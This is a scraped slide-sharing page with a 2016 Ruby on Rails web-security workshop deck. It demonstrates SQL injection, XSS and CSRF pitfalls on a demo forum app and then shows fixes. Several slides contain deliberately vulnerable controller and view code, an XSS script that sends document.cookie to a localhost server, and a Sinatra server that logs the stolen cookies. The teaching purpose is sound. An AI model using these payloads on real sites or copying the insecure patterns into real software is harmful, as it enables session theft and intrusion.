Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
AnnaKlepacka1
205 views
65 slides
Apr 21, 2016
Slide 1 of 65
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
About This Presentation
Web Applications Hacking – Ruby on Rails example.
Attack web applications by using SQL attacks, CSRF, XSS. You will learn how to extract information by generating API json / xml and how to use cookies to code injection.
Slide Content
Web applications hacking
Ruby on Rails example
Ruby on Rails example
●Software House located in Krakow
●Ruby on Rails, Android and iOS
●Specialized in building web and mobile applications
●Collaborating with many companies and startups from all over
the world
ABOUT US:
●Ruby on Rails, Android and iOS
●Specialized in building web and mobile applications
●Collaborating with many companies and startups from all over
the world
ABOUT US:
2009 - software house was founded
50 projects created
40 developers
Awards:
OUR HISTORY:
Top Web & Software Developers
in Poland 2015
Top Tens Ruby on Rails
Development Companies
50 projects created
40 developers
Awards:
OUR HISTORY:
Top Web & Software Developers
in Poland 2015
Top Tens Ruby on Rails
Development Companies
HOMEAHEAD
PROEST
Software for
gastronomy
gastronomy
OWASP TOP 10
1.Injection
2.Broken authentication and session management
3.Cross-Site Scripting
4.Insecure direct object reference
5.Security misconfiguration
6.Sensitive data exposure
7.Missing function level access control
8.Cross-Site Request Forgery
9.Using components with known vulnerabilities
10.Unvalidated redirects and forwards
1.Injection
2.Broken authentication and session management
3.Cross-Site Scripting
4.Insecure direct object reference
5.Security misconfiguration
6.Sensitive data exposure
7.Missing function level access control
8.Cross-Site Request Forgery
9.Using components with known vulnerabilities
10.Unvalidated redirects and forwards
Target Application
Simple Ruby on Rails forum
Ruby 2.3.0
Rails 4.2.6
PostgreSQL 9.4
Ruby 2.3.0
Rails 4.2.6
PostgreSQL 9.4
PostgreSQL Database schema
# app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by title: params[:title]
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by title: params[:title]
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:
# app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by “title = #{params[:title]}”
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by “title = #{params[:title]}”
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:
Is SQL injection
impossible in Rails?
impossible in Rails?
Unfortunately, no.
It’s possible,
just not dropping tables.
It’s possible,
just not dropping tables.
Further reading:
rails-sqli.org
rails-sqli.org
# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content
COMMENTS - create and show:
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content
COMMENTS - create and show:
# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content.html_safe
COMMENTS - create and show:
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content.html_safe
COMMENTS - create and show:
<!-- XSS test -->
Hi guys!
<script> alert(“I came for your cookies!“ ) </script>
<!-- Time to get some cookies! -->
What’s up?
<script>
xhttp = new XMLHttpRequest();
xhttp.open(“GET”, “http://localhost:4567/cookies/ ” + document.cookie);
xhttp.send();
</script>
XSS ATTACK - TEST AND STEALING COOKIES
Hi guys!
<script> alert(“I came for your cookies!“ ) </script>
<!-- Time to get some cookies! -->
What’s up?
<script>
xhttp = new XMLHttpRequest();
xhttp.open(“GET”, “http://localhost:4567/cookies/ ” + document.cookie);
xhttp.send();
</script>
XSS ATTACK - TEST AND STEALING COOKIES
require ‘sinatra’
require ‘logger’
logger = Logger.new ‘log/cookies.log’
get ‘/cookies/:cookie’ do
logger.info ‘=== COOKIE ===’
logger.info params[ :cookie]
logger.info ‘/== COOKIE ===’
end
XSS ATTACK - SIMPLE COOKIES LOGGING SERVER
require ‘logger’
logger = Logger.new ‘log/cookies.log’
get ‘/cookies/:cookie’ do
logger.info ‘=== COOKIE ===’
logger.info params[ :cookie]
logger.info ‘/== COOKIE ===’
end
XSS ATTACK - SIMPLE COOKIES LOGGING SERVER
Are all cookies HTTPOnly
in Rails?
in Rails?
cookies[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = {
value: ‘http://localhost/after_sign_in_path’ ,
httponly: true
}
// finally safe
UNFORTUNATELY - NO. ALWAYS USE THIS HASH!
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = {
value: ‘http://localhost/after_sign_in_path’ ,
httponly: true
}
// finally safe
UNFORTUNATELY - NO. ALWAYS USE THIS HASH!
It’s safe from cookies stealing,
but is it safe from XSS?
but is it safe from XSS?
# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= sanitize comment.content.html_safe
COMMENTS - create and show:
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= sanitize comment.content.html_safe
COMMENTS - create and show:
Further reading:
molily.de/xss/
molily.de/xss/
# app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
# Prevent CSRF attacks by raising an exception.
# For APIs you may want to use :null_session instead.
protect_from_forgery with: :exception
end
DEFAULT CSRF PROTECTION IN RAILS:
class ApplicationController < ActionController::Base
# Prevent CSRF attacks by raising an exception.
# For APIs you may want to use :null_session instead.
protect_from_forgery with: :exception
end
DEFAULT CSRF PROTECTION IN RAILS:
Is Rails CSRF protection
unbreakable?
unbreakable?
HTTP Verbs
●GET
●POST
●PUT
●PATCH
●DELETE
●HEAD
●OPTIONS
●TRACE
●CONNECT
●GET
●POST
●PUT
●PATCH
●DELETE
●HEAD
●OPTIONS
●TRACE
●CONNECT
HTTP Verbs NOT protected by Rails CSRF
●GET
●POST
●PUT
●PATCH
●DELETE
●HEAD
●OPTIONS
●TRACE
●CONNECT
●GET
●POST
●PUT
●PATCH
●DELETE
●HEAD
●OPTIONS
●TRACE
●CONNECT
CSRF pitfall
in Rails routing
in Rails routing
# config/routes.rb
match ‘/forum_threads/:forum_thread_id/comments/:id/update’ ,
to: ‘comments#update’,
via: :all # Rails 4+
CSRF PITFALL IN RAILS ROUTING - MATCH:
match ‘/forum_threads/:forum_thread_id/comments/:id/update’ ,
to: ‘comments#update’,
via: :all # Rails 4+
CSRF PITFALL IN RAILS ROUTING - MATCH:
Is Rails CSRF protection
100% safe?
100% safe?
Yes it is - unless you’re
not staying close to Rails guides
not staying close to Rails guides
Further reading:
https://rorsecurity.info/portfolio/cross-site-
request-forgery-and-rails
https://rorsecurity.info/portfolio/cross-site-
request-forgery-and-rails
Sensitive data exposure
1.Credentials leaking to public repositories.
2.Lack of proper in-app authorization.
3.Debugging information in production enviroments.
4.Access not restricted, wrong access privileges.
5.Lack of encryption.
6.API responses containing sensitive data.
1.Credentials leaking to public repositories.
2.Lack of proper in-app authorization.
3.Debugging information in production enviroments.
4.Access not restricted, wrong access privileges.
5.Lack of encryption.
6.API responses containing sensitive data.
Protecting against sensitive data exposure
1.Code reviews.
2.Careful authorization.
3.Strict access.
4.Encryption.
5.API exposing only necessary information.
1.Code reviews.
2.Careful authorization.
3.Strict access.
4.Encryption.
5.API exposing only necessary information.
Creating the secure API
# app/controllers/forum_threads_controller.rb
def index
@threads = ForumThread.order(updated_at: :desc)
respond_to do |format|
format.html
format.json { render json: @threads }
end
end
GENERATED RAILS API
def index
@threads = ForumThread.order(updated_at: :desc)
respond_to do |format|
format.html
format.json { render json: @threads }
end
end
GENERATED RAILS API
[
{
”id”: 2,
”title”: "Curabitur vel vulputate libero." ,
”created_at”: "2016-04-18T10:10:40.648Z" ,
”updated_at”: "2016-04-18T10:10:40.648Z"
},
{
"id": 1,
"title": "Lorem ipsum dolor sit amet." ,
"created_at": "2016-04-18T10:10:40.607Z" ,
"updated_at": "2016-04-18T10:10:40.607Z"
}
]
GENERATED RAILS API - OUTPUT
{
”id”: 2,
”title”: "Curabitur vel vulputate libero." ,
”created_at”: "2016-04-18T10:10:40.648Z" ,
”updated_at”: "2016-04-18T10:10:40.648Z"
},
{
"id": 1,
"title": "Lorem ipsum dolor sit amet." ,
"created_at": "2016-04-18T10:10:40.607Z" ,
"updated_at": "2016-04-18T10:10:40.607Z"
}
]
GENERATED RAILS API - OUTPUT
# app/controllers/forum_threads_controller.rb
def index
@threads = ForumThread.order(updated_at: :desc)
respond_to do |format|
format.html
format.json { render json: @threads.only(:title).to_json }
end
end
GENERATED RAILS API - SECURING THE OUTPUT
def index
@threads = ForumThread.order(updated_at: :desc)
respond_to do |format|
format.html
format.json { render json: @threads.only(:title).to_json }
end
end
GENERATED RAILS API - SECURING THE OUTPUT
[
{
”title”: "Curabitur vel vulputate libero."
},
{
"title": "Lorem ipsum dolor sit amet."
}
]
GENERATED RAILS API - SECURED OUTPUT
{
”title”: "Curabitur vel vulputate libero."
},
{
"title": "Lorem ipsum dolor sit amet."
}
]
GENERATED RAILS API - SECURED OUTPUT
Solutions for building pretty, secure APIs
Active Model Serializers
●Object Oriented approach
●Ability to define decorating methods
●All Ruby!
●Flexible
●Easy to test
●Adapter to follow JSON API v1.0 schema
●YARD documented
Jbuilder
●Templates approach
●ERblike - might be easy for newcomers
●Flexible
●Hard to test
●No real “adapter” - if you want JSON
API v1.0, you have to do it by yourself
Active Model Serializers
●Object Oriented approach
●Ability to define decorating methods
●All Ruby!
●Flexible
●Easy to test
●Adapter to follow JSON API v1.0 schema
●YARD documented
Jbuilder
●Templates approach
●ERblike - might be easy for newcomers
●Flexible
●Hard to test
●No real “adapter” - if you want JSON
API v1.0, you have to do it by yourself
Summary
Things to remember from this workshop:
1.Never trust anything that comes from user. Params, cookies, headers,
everything. Nothing that comes from user is safe to use.
2.Always sanitize your HTML output. Especially when you’re allowing
links or images that comes from user.
3.Be careful with match routing. Just don’t use it if you don’t have to.
4.Inspect your outputs. Return only necessary information from your API.
5.Last but not least. Get someone to review your code.
1.Never trust anything that comes from user. Params, cookies, headers,
everything. Nothing that comes from user is safe to use.
2.Always sanitize your HTML output. Especially when you’re allowing
links or images that comes from user.
3.Be careful with match routing. Just don’t use it if you don’t have to.
4.Inspect your outputs. Return only necessary information from your API.
5.Last but not least. Get someone to review your code.
Thank you for your attention.
Na zjeździe 11
30-527 Krakow, Poland
tel: +48 12 391 60 76
Silicon Valley
Acceleration Center.
180 Sansome Street
San Francisco, CA 94104
tel: 1-415-449-4791
[email protected]
www.railwaymen.org
@Railwaymen_org
railwaymen.software.development
/company/railwaymen
30-527 Krakow, Poland
tel: +48 12 391 60 76
Silicon Valley
Acceleration Center.
180 Sansome Street
San Francisco, CA 94104
tel: 1-415-449-4791
[email protected]
www.railwaymen.org
@Railwaymen_org
railwaymen.software.development
/company/railwaymen
Categories
TechnologyDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 205
- Slides 65
- Age 3514 days
Related Slideshows
11
8-top-ai-courses-for-customer-support-representatives-in-2025.pptx
JeroenErne2
49 views
10
7-essential-ai-courses-for-call-center-supervisors-in-2025.pptx
JeroenErne2
48 views
13
25-essential-ai-courses-for-user-support-specialists-in-2025.pptx
JeroenErne2
37 views
11
8-essential-ai-courses-for-insurance-customer-service-representatives-in-2025.pptx
JeroenErne2
35 views
21
Know for Certain
DaveSinNM
23 views
17
PPT OPD LES 3ertt4t4tqqqe23e3e3rq2qq232.pptx
novasedanayoga46
26 views